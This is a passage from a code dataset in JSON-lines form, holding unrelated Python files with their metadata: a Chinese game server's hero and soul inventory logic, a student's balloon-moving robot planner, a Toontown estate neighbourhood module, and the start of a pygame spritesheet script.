soul_needs_amount)]\n else:\n # need common soul\n resource_needs['stuffs'] = [(22, common_soul_needs)]\n\n resource = Resource(self.char_id, \"Hero Step Up\", 'step up {0}'.format(self.id))\n try:\n resource.check_and_remove(**resource_needs)\n except SanguoException as e:\n if e.error_id == errormsg.SOUL_NOT_ENOUGH or e.error_id == errormsg.STUFF_NOT_ENOUGH:\n raise SanguoException(\n errormsg.HERO_STEP_UP_ALL_NOT_ENOUGH,\n self.char_id,\n \"Hero Step Up\",\n \"soul not enough\"\n )\n raise e\n\n # 扣完东西了,开始搞一次\n self.hero.progress += 1\n if self.hero.progress >= self.max_socket_amount:\n # 真正的升阶\n # 否则仅仅是记录当前状态\n self.hero.step += 1\n self.hero.progress = 0\n\n hero_step_up_signal.send(\n sender=None,\n char_id=self.char_id,\n hero_id=self.id,\n new_step=self.hero.step\n )\n\n self.step = self.hero.step\n self.hero.save()\n hero_changed_signal.send(\n sender=None,\n hero_id=self.id\n )\n\n\nclass HeroSoul(object):\n def __init__(self, char_id):\n self.char_id = char_id\n try:\n self.mongo_hs = MongoHeroSoul.objects.get(id=self.char_id)\n except DoesNotExist:\n self.mongo_hs = MongoHeroSoul(id=self.char_id)\n self.mongo_hs.souls = {}\n self.mongo_hs.save()\n\n def soul_amount(self, _id):\n return self.mongo_hs.souls.get(str(_id), 0)\n\n def has_soul(self, _id, amount=1):\n return self.soul_amount(_id) >= amount\n\n def add_soul(self, souls):\n new_souls = []\n update_souls = []\n for _id, amount in souls:\n str_id = str(_id)\n if str_id in self.mongo_hs.souls:\n self.mongo_hs.souls[str_id] += amount\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n else:\n self.mongo_hs.souls[str_id] = amount\n new_souls.append((_id, amount))\n\n self.mongo_hs.save()\n if new_souls:\n msg = protomsg.AddHeroSoulNotify()\n for _id, amount in new_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def remove_soul(self, souls):\n remove_souls = []\n update_souls = []\n for _id, amount in souls:\n if not self.has_soul(_id, amount):\n raise SanguoException(\n errormsg.SOUL_NOT_ENOUGH,\n self.char_id,\n \"HeroSoul Remove\",\n \"HeroSoul {0} not enough/exist, expected amount {1}\".format(_id, amount)\n )\n\n for _id, amount in souls:\n str_id = str(_id)\n self.mongo_hs.souls[str_id] -= amount\n if self.mongo_hs.souls[str_id] <= 0:\n remove_souls.append(_id)\n self.mongo_hs.souls.pop(str_id)\n else:\n update_souls.append((_id, self.mongo_hs.souls[str_id]))\n\n self.mongo_hs.save()\n if remove_souls:\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.extend(remove_souls)\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n if update_souls:\n msg = protomsg.UpdateHeroSoulNotify()\n for _id, amount in update_souls:\n s = msg.herosouls.add()\n s.id = _id\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def purge_soul(self, _id):\n self.mongo_hs.souls.pop(str(_id))\n self.mongo_hs.save()\n\n msg = protomsg.RemoveHeroSoulNotify()\n msg.ids.append(_id)\n publish_to_char(self.char_id, pack_msg(msg))\n\n\n def send_notify(self):\n msg = protomsg.HeroSoulNotify()\n for _id, amount in self.mongo_hs.souls.iteritems():\n s = msg.herosouls.add()\n s.id = int(_id)\n s.amount = amount\n\n publish_to_char(self.char_id, pack_msg(msg))\n\nclass _SaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n\nclass _FakeSaveHeroResult(object):\n __slots__ = ['id_range', 'actual_heros', 'to_souls']\n def __init__(self):\n self.id_range = []\n self.actual_heros = []\n self.to_souls = []\n\n def __bool__(self):\n return False\n __nonzero__ = __bool__\n\n\nFakeSaveHeroResult = _FakeSaveHeroResult()\n\n\n\ndef get_char_hero_oids(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return [h.oid for h in heros]\n\ndef save_hero(char_id, hero_original_ids, add_notify=True):\n if not isinstance(hero_original_ids, (list, tuple)):\n hero_original_ids = [hero_original_ids]\n\n char_hero_oids = get_char_hero_oids(char_id)\n\n to_soul_hero_ids = []\n for h in hero_original_ids[:]:\n if h in char_hero_oids:\n to_soul_hero_ids.append(h)\n hero_original_ids.remove(h)\n\n souls = {}\n if to_soul_hero_ids:\n for sid in to_soul_hero_ids:\n this_hero = HEROS[sid]\n souls[this_hero.id] = souls.get(this_hero.id, 0) + 1\n\n for k in souls.keys():\n souls[k] *= external_calculate.Hero.step_up_using_soul_amount(HEROS[k].quality)\n\n hs = HeroSoul(char_id)\n hs.add_soul(souls.items())\n\n hero_to_soul_signal.send(\n sender=None,\n char_id=char_id,\n souls=souls.items(),\n )\n\n id_range = []\n if hero_original_ids:\n length = len(hero_original_ids)\n id_range = id_generator('charhero', length)\n for i, _id in enumerate(id_range):\n MongoHero(id=_id, char=char_id, oid=hero_original_ids[i], step=HERO_START_STEP, progress=0).save()\n\n hero_add_signal.send(\n sender=None,\n char_id=char_id,\n hero_ids=id_range,\n hero_original_ids=hero_original_ids,\n send_notify=add_notify,\n )\n\n res = _SaveHeroResult()\n res.id_range = id_range\n res.actual_heros = [(oid, 1) for oid in hero_original_ids]\n res.to_souls = souls.items()\n return res\n\n\ndef recruit_hero(char_id, _id):\n if _id not in HEROS:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Soul {0} not exist\".format(_id)\n )\n\n char_hero_oids = get_char_hero_oids(char_id)\n if _id in char_hero_oids:\n raise SanguoException(\n errormsg.SOUL_CAN_NOT_RECRUIT,\n char_id,\n \"Recruit Hero\",\n \"Hero {0} already exist\".format(_id)\n )\n\n\n soul_amount = external_calculate.Hero.step_up_using_soul_amount(HEROS[_id].quality)\n hs = HeroSoul(char_id)\n hs.remove_soul([(_id, soul_amount)])\n\n save_hero(char_id, [_id])\n\n", "sub_path": "sanguo/core/hero.py", "file_name": "hero.py", "file_ext": "py", "file_size_in_byte": 14254, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "core.mongoscheme.MongoHero.objects.filter", "line_number": 25, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 25, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 43, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.attack", "line_number": 45, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 45, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.defense", "line_number": 46, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 46, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 46, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.hp", "line_number": 47, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 47, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 47, "usage_type": "name"}, {"api_name": "preset.data.MONSTERS", "line_number": 53, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.attack", "line_number": 55, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 55, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 55, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.defense", "line_number": 56, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 56, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 56, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.hp", "line_number": 57, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 57, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 57, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoHero.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 73, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoCharacter.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoCharacter.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoCharacter", "line_number": 74, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 86, "usage_type": "name"}, {"api_name": "core.formation.Formation", "line_number": 100, "usage_type": "call"}, {"api_name": "core.item.Equipment", "line_number": 110, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoAchievement.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoAchievement.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoAchievement", "line_number": 150, "usage_type": "name"}, {"api_name": "mongoengine.DoesNotExist", "line_number": 151, "usage_type": "name"}, {"api_name": "preset.data.ACHIEVEMENTS", "line_number": 156, "usage_type": "name"}, {"api_name": "utils.cache.set", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.cache", "line_number": 174, "usage_type": "name"}, {"api_name": "utils.cache.get", "line_number": 178, "usage_type": "call"}, {"api_name": "utils.cache", "line_number": 178, "usage_type": "name"}, {"api_name": "{'Equipment': 'core.item.Equipment'}", "line_number": 182, "usage_type": "call"}, {"api_name": "preset.settings.HERO_MAX_STEP", "line_number": 190, "usage_type": "name"}, {"api_name": "preset.settings.HERO_STEP_UP_SOCKET_AMOUNT", "line_number": 192, "usage_type": "name"}, {"api_name": "preset.settings.HERO_MAX_STEP", "line_number": 202, "usage_type": "name"}, {"api_name": "core.exception.SanguoException", "line_number": 203, "usage_type": "call"}, {"api_name": "preset.errormsg.HERO_REACH_MAX_STEP", "line_number": 204, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 204, "usage_type": "name"}, {"api_name": "preset.settings.HERO_MAX_STEP", "line_number": 207, "usage_type": "argument"}, {"api_name": "dll.external_calculate.Hero.step_up_using_gold", "line_number": 211, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 211, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 211, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.step_up_using_soul_amount", "line_number": 214, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 214, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 214, "usage_type": "name"}, {"api_name": "core.resource.Resource", "line_number": 227, "usage_type": "call"}, {"api_name": "core.exception.SanguoException", "line_number": 230, "usage_type": "name"}, {"api_name": "preset.errormsg.SOUL_NOT_ENOUGH", "line_number": 231, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 231, "usage_type": "name"}, {"api_name": "preset.errormsg.STUFF_NOT_ENOUGH", "line_number": 231, "usage_type": "attribute"}, {"api_name": "core.exception.SanguoException", "line_number": 232, "usage_type": "call"}, {"api_name": "preset.errormsg.HERO_STEP_UP_ALL_NOT_ENOUGH", "line_number": 233, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 233, "usage_type": "name"}, {"api_name": "core.signals.hero_step_up_signal.send", "line_number": 248, "usage_type": "call"}, {"api_name": "core.signals.hero_step_up_signal", "line_number": 248, "usage_type": "name"}, {"api_name": "core.signals.hero_changed_signal.send", "line_number": 257, "usage_type": "call"}, {"api_name": "core.signals.hero_changed_signal", "line_number": 257, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoHeroSoul.objects.get", "line_number": 267, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHeroSoul.objects", "line_number": 267, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHeroSoul", "line_number": 267, "usage_type": "name"}, {"api_name": "mongoengine.DoesNotExist", "line_number": 268, "usage_type": "name"}, {"api_name": "core.mongoscheme.MongoHeroSoul", "line_number": 269, "usage_type": "call"}, {"api_name": "protomsg.AddHeroSoulNotify", "line_number": 293, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 299, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 299, "usage_type": "call"}, {"api_name": "protomsg.UpdateHeroSoulNotify", "line_number": 302, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 308, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 308, "usage_type": "call"}, {"api_name": "core.exception.SanguoException", "line_number": 316, "usage_type": "call"}, {"api_name": "preset.errormsg.SOUL_NOT_ENOUGH", "line_number": 317, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 317, "usage_type": "name"}, {"api_name": "protomsg.RemoveHeroSoulNotify", "line_number": 334, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 337, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 337, "usage_type": "call"}, {"api_name": "protomsg.UpdateHeroSoulNotify", "line_number": 340, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 346, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 346, "usage_type": "call"}, {"api_name": "protomsg.RemoveHeroSoulNotify", "line_number": 353, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 355, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 355, "usage_type": "call"}, {"api_name": "protomsg.HeroSoulNotify", "line_number": 359, "usage_type": "call"}, {"api_name": "core.msgpipe.publish_to_char", "line_number": 365, "usage_type": "call"}, {"api_name": "utils.pack_msg", "line_number": 365, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects.filter", "line_number": 387, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero.objects", "line_number": 387, "usage_type": "attribute"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 387, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 405, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.step_up_using_soul_amount", "line_number": 409, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 409, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 409, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 409, "usage_type": "name"}, {"api_name": "core.signals.hero_to_soul_signal.send", "line_number": 414, "usage_type": "call"}, {"api_name": "core.signals.hero_to_soul_signal", "line_number": 414, "usage_type": "name"}, {"api_name": "utils.functional.id_generator", "line_number": 423, "usage_type": "call"}, {"api_name": "core.mongoscheme.MongoHero", "line_number": 425, "usage_type": "call"}, {"api_name": "preset.settings.HERO_START_STEP", "line_number": 425, "usage_type": "name"}, {"api_name": "core.signals.hero_add_signal.send", "line_number": 427, "usage_type": "call"}, {"api_name": "core.signals.hero_add_signal", "line_number": 427, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 443, "usage_type": "name"}, {"api_name": "core.exception.SanguoException", "line_number": 444, "usage_type": "call"}, {"api_name": "preset.errormsg.SOUL_CAN_NOT_RECRUIT", "line_number": 445, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 445, "usage_type": "name"}, {"api_name": "core.exception.SanguoException", "line_number": 453, "usage_type": "call"}, {"api_name": "preset.errormsg.SOUL_CAN_NOT_RECRUIT", "line_number": 454, "usage_type": "attribute"}, {"api_name": "preset.errormsg", "line_number": 454, "usage_type": "name"}, {"api_name": "dll.external_calculate.Hero.step_up_using_soul_amount", "line_number": 461, "usage_type": "call"}, {"api_name": "dll.external_calculate.Hero", "line_number": 461, "usage_type": "attribute"}, {"api_name": "dll.external_calculate", "line_number": 461, "usage_type": "name"}, {"api_name": "preset.data.HEROS", "line_number": 461, "usage_type": "name"}]} {"seq_id": "151801508", "text": "from json import load\nfrom copy import deepcopy\nfrom math import sqrt\n\ndef parse_json(file):\n located = {}\n on = {}\n\n #open json file for initial world\n f = open(file)\n fdata = load(f)\n\n #goes through each key from json file \n for key in fdata.keys():\n #set the world \n located[key] = fdata[key]\n on[key] = 'floor'\n\n return located, on \n\ndef distance(tuple1,tuple2): \n return sqrt((tuple1[0]-tuple2[0])**2 + (tuple1[1]-tuple2[1])**2)\n\nclass World:\n\n def __init__(self, world_file, robot_loc):\n self.located, self.on = parse_json(world_file)\n self.located['Robot'] = robot_loc\n self.cost = 0\n self.onRobot = 0\n self.action = None\n \n # returns list of drive successors\n def drive(self):\n successors = []\n if self.checkRobot(): \n #drive to each ballon locations\n curr_robot_loc = self.located['Robot']\n #drive to each balloon's location\n for eachKey in self.located.keys(): \n if eachKey is not 'Robot' :\n #get location of the ballon \n new_robot_loc = self.located[eachKey]\n #make copy of this self \n temp = deepcopy(self)\n #update the location (simulate the drive)\n temp.located['Robot'] = new_robot_loc\n # assign action to world\n temp.action = ('drive', new_robot_loc)\n #cost actually distance to drive based on robot's location \n temp.updateCost(distance(curr_robot_loc,new_robot_loc))\n #append temp to allSuccessors \n successors.append(temp)\n \n return successors\n\n def pickup1(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 1:\n #pick up ballon (update where balloon on)\n #make copy of this self \n temp = deepcopy(self)\n # add to onRobot\n temp.onRobot += 1\n #change status of balloon\n temp.on[eachKey] = 'Robot'\n # assign action to world\n temp.action = ('pickup', NULL)\n #update cost of picking up a second balloon\n temp.updateCost(5)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n \n def pickup2(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'floor') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot == 0:\n #pick up the second balloon (update where the second balloon on)\n #make copy of this self \n temp = deepcopy(self)\n # add to onRobot\n temp.onRobot += 1\n # update on\n temp.on[eachKey] = 'Robot'\n # assign action to world\n temp.action = ('pickup', NULL)\n #update cost of picking up 2 balloon \n temp.updateCost(7)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n \n def putdown(self):\n successors = []\n for eachKey in self.located.keys():\n if (eachKey is not 'Robot') and (self.on[eachKey] is 'Robot') and (self.located['Robot'] == self.located[eachKey]) and self.onRobot > 0:\n #make copy of this self \n temp = deepcopy(self)\n #update the location \n temp.located[eachKey] = temp.located['Robot']\n # update status \n temp.on[eachKey] = 'floor'\n # assign action to world\n temp.action = ('putdown', NULL)\n #update cost of picking up 1 ballon \n temp.updateCost(5)\n #append temp to allSuccessors \n successors.append(temp)\n\n return successors\n\n def checkRobot (self): \n if 'Robot' in self.located.keys(): \n return True \n return False \n\n def getOn(self): \n return self.on\n\n def getLocated(self): \n return self.located \n \n def robotHasBalloon(self,lookAt): \n for eachKey in self.on.keys(): \n if (eachKey is not lookAt) and (self.on[eachKey] == 'Robot'):\n return True \n return False \n\n def updateCost(self,number):\n self.cost = number\n\n def getSuccessors(self):\n #list of all successors \n allSuccessors = [] \n\n #1. add drive action successors \n allSuccessors.extend(self.drive())\n\n #2.Check if robot can pick up a second ballon (any color)\n allSuccessors.extend(self.pickup1())\n \n #3.Check if robot can pick up a balloon (any color) from none\n allSuccessors.extend(self.pickup2())\n\n #4.Check if robot can put down a balloon\n allSuccessors.extend(self.putdown())\n\n return allSuccessors\n\n def distanceFromGoal(self, goal_locations):\n '''\n A hueristic that sums of the distance of the balloons with where they are and where they should be \n \n goal_locations: a dictionary of the final balloon locations {['Red': (5,7), ...]}\n '''\n sum_ = 0\n for balloon in goal_locations.keys():\n sum_ += distance(self.located[balloon], goal_locations[balloon])\n \n return sum_\n\n def getAction(self):\n return self.action\n\n def printWorld(self):\n print(\"this is where everything locate \", self.located)\n print(\"this is everything that are on \", self.on)\n print(\"cost to get to this world is \", self.cost)\n \n\n############ end of world class ###############\n\n\n\n\nw = World('simple.json', (1,3))\nw.printWorld()\nallChildren = w.getSuccessors()\nfor i in allChildren:\n i.printWorld()\n\n\n\n", "sub_path": "actionPlaning/world-1.py", "file_name": "world-1.py", "file_ext": "py", "file_size_in_byte": 6159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 22, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 45, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 83, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 102, "usage_type": "call"}]} {"seq_id": "645047200", "text": "# File: t (Python 2.2)\n\nfrom direct.showbase.ShowBaseGlobal import *\nfrom toontown.toonbase.ToonBaseGlobal import *\nfrom toontown.toonbase.ToontownGlobals import *\nfrom toontown.distributed.ToontownMsgTypes import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom direct.fsm import ClassicFSM\nfrom direct.fsm import State\nfrom toontown.minigame import Purchase\nfrom otp.avatar import DistributedAvatar\nimport SkyUtil\nimport Hood\nfrom toontown.estate import EstateLoader\nfrom toontown.estate import HouseGlobals\nimport ZoneUtil\n\nclass EstateHood(Hood.Hood):\n notify = DirectNotifyGlobal.directNotify.newCategory('EstateHood')\n \n def __init__(self, parentFSM, doneEvent, dnaStore, hoodId):\n Hood.Hood.__init__(self, parentFSM, doneEvent, dnaStore, hoodId)\n self.fsm = ClassicFSM.ClassicFSM('Hood', [\n State.State('start', self.enterStart, self.exitStart, [\n 'safeZoneLoader']),\n State.State('safeZoneLoader', self.enterSafeZoneLoader, self.exitSafeZoneLoader, [\n 'quietZone']),\n State.State('quietZone', self.enterQuietZone, self.exitQuietZone, [\n 'safeZoneLoader']),\n State.State('final', self.enterFinal, self.exitFinal, [])], 'start', 'final')\n self.fsm.enterInitialState()\n self.id = MyEstate\n self.safeZoneLoaderClass = EstateLoader.EstateLoader\n self.storageDNAFile = 'phase_5.5/dna/storage_estate.dna'\n self.holidayStorageDNADict = {\n WINTER_DECORATIONS: [\n 'phase_5.5/dna/winter_storage_estate.dna'] }\n self.skyFile = 'phase_3.5/models/props/TT_sky'\n self.popupInfo = None\n\n \n def load(self):\n Hood.Hood.load(self)\n\n \n def unload(self):\n del self.safeZoneLoaderClass\n if self.popupInfo:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n if not wantOtpServer:\n base.cr.disableAll()\n \n Hood.Hood.unload(self)\n\n \n def enter(self, requestStatus):\n hoodId = requestStatus['hoodId']\n zoneId = requestStatus['zoneId']\n self.accept('kickToPlayground', self.kickToPlayground)\n self.fsm.request(requestStatus['loader'], [\n requestStatus])\n\n \n def exit(self):\n if self.loader:\n self.loader.exit()\n self.loader.unload()\n del self.loader\n \n Hood.Hood.exit(self)\n\n \n def loadLoader(self, requestStatus):\n loaderName = requestStatus['loader']\n if loaderName == 'safeZoneLoader':\n self.loader = self.safeZoneLoaderClass(self, self.fsm.getStateNamed('safeZoneLoader'), self.loaderDoneEvent)\n self.loader.load()\n \n\n \n def spawnTitleText(self, zoneId):\n return None\n\n \n def hideTitleTextTask(self, task):\n return Task.done\n\n \n def kickToPlayground(self, retCode):\n if retCode == 0:\n msg = TTLocalizer.EstateOwnerLeftMessage % HouseGlobals.BOOT_GRACE_PERIOD\n self._EstateHood__popupKickoutMessage(msg)\n elif retCode == 1:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n elif retCode == 2:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': zoneId,\n 'shardId': None,\n 'avId': -1 }\n messenger.send(self.doneEvent)\n else:\n self.notify.error('unknown reason for exiting estate')\n\n \n def _EstateHood__popupKickoutMessage(self, msg):\n if self.popupInfo != None:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n buttons = loader.loadModelOnce('phase_3/models/gui/dialog_box_buttons_gui')\n okButtonImage = (buttons.find('**/ChtBx_OKBtn_UP'), buttons.find('**/ChtBx_OKBtn_DN'), buttons.find('**/ChtBx_OKBtn_Rllvr'))\n self.popupInfo = DirectFrame(parent = hidden, relief = None, state = 'normal', text = msg, frameSize = (-1, 1, -1, 1), text_wordwrap = 10, geom = getDefaultDialogGeom(), geom_color = GlobalDialogColor, geom_scale = (0.88, 1, 0.75), geom_pos = (0, 0, -0.080000000000000002), text_scale = 0.080000000000000002, text_pos = (0, 0.10000000000000001))\n DirectButton(self.popupInfo, image = okButtonImage, relief = None, text = TTLocalizer.EstatePopupOK, text_scale = 0.050000000000000003, text_pos = (0.0, -0.10000000000000001), textMayChange = 0, pos = (0.0, 0.0, -0.29999999999999999), command = self._EstateHood__handleKickoutOk)\n buttons.removeNode()\n self.popupInfo.reparentTo(aspect2d)\n\n \n def _EstateHood__handleKickoutOk(self):\n self.popupInfo.reparentTo(hidden)\n\n \n def skyTrack(self, task):\n return SkyUtil.cloudSkyTrack(task)\n\n \n def startSky(self):\n SkyUtil.startCloudSky(self)\n if base.cloudPlatformsEnabled:\n self.loader.startCloudPlatforms()\n \n\n \n def stopSky(self):\n Hood.Hood.stopSky(self)\n self.loader.stopCloudPlatforms()\n\n\n", "sub_path": "toontown/hood/EstateHood.py", "file_name": "EstateHood.py", "file_ext": "py", "file_size_in_byte": 5596, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "Hood.Hood", "line_number": 18, "usage_type": "attribute"}, {"api_name": "direct.directnotify.DirectNotifyGlobal.directNotify.newCategory", "line_number": 19, "usage_type": "call"}, {"api_name": "direct.directnotify.DirectNotifyGlobal.directNotify", "line_number": 19, "usage_type": "attribute"}, {"api_name": "direct.directnotify.DirectNotifyGlobal", "line_number": 19, "usage_type": "name"}, {"api_name": "Hood.Hood.__init__", "line_number": 22, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 22, "usage_type": "attribute"}, {"api_name": "direct.fsm.ClassicFSM.ClassicFSM", "line_number": 23, "usage_type": "call"}, {"api_name": "direct.fsm.ClassicFSM", "line_number": 23, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 24, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 24, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 26, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 26, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 28, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 28, "usage_type": "name"}, {"api_name": "direct.fsm.State.State", "line_number": 30, "usage_type": "call"}, {"api_name": "direct.fsm.State", "line_number": 30, "usage_type": "name"}, {"api_name": "toontown.estate.EstateLoader.EstateLoader", "line_number": 33, "usage_type": "attribute"}, {"api_name": "toontown.estate.EstateLoader", "line_number": 33, "usage_type": "name"}, {"api_name": "Hood.Hood.load", "line_number": 43, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 43, "usage_type": "attribute"}, {"api_name": "Hood.Hood.unload", "line_number": 55, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 55, "usage_type": "attribute"}, {"api_name": "Hood.Hood.exit", "line_number": 72, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 72, "usage_type": "attribute"}, {"api_name": "toontown.estate.HouseGlobals.BOOT_GRACE_PERIOD", "line_number": 93, "usage_type": "attribute"}, {"api_name": "toontown.estate.HouseGlobals", "line_number": 93, "usage_type": "name"}, {"api_name": "ZoneUtil.getBranchLoaderName", "line_number": 98, "usage_type": "call"}, {"api_name": "ZoneUtil.getToonWhereName", "line_number": 99, "usage_type": "call"}, {"api_name": "ZoneUtil.getBranchLoaderName", "line_number": 109, "usage_type": "call"}, {"api_name": "ZoneUtil.getToonWhereName", "line_number": 110, "usage_type": "call"}, {"api_name": "SkyUtil.cloudSkyTrack", "line_number": 139, "usage_type": "call"}, {"api_name": "SkyUtil.startCloudSky", "line_number": 143, "usage_type": "call"}, {"api_name": "Hood.Hood.stopSky", "line_number": 150, "usage_type": "call"}, {"api_name": "Hood.Hood", "line_number": 150, "usage_type": "attribute"}]} {"seq_id": "75647117", "text": "import pygame\r\nimport random\r\n\r\nglobal BLACK, WHITE, BLUE, SCREEN_WIDTH, SCREEN_HEIGHT, GAME_FLOOR\r\n\r\n#set up constants for screen dimensions and colours\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nBLUE = (0,0,255)\r\n\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\nGAME_FLOOR = SCREEN_HEIGHT-100\r\n\r\n#create an object to act as a reference for our spritesheet\r\nclass SpriteSheet(object):\r\n\tdef __init__(self, filename):\r\n\t\t#load the spritesheet specified by filename \r\n\t\tself.sprite_sheet = pygame.image.load(filename).convert()\r\n\t\t#get dimension information for the sprite sheet\r\n\t\tself.rect = self.sprite_sheet.get_rect()\r\n\r\n\t#this function returns a section of the spritesheet as an image\r\n\tdef get_image(self,x,y,width,height):\r\n\t\t#create a blank surface 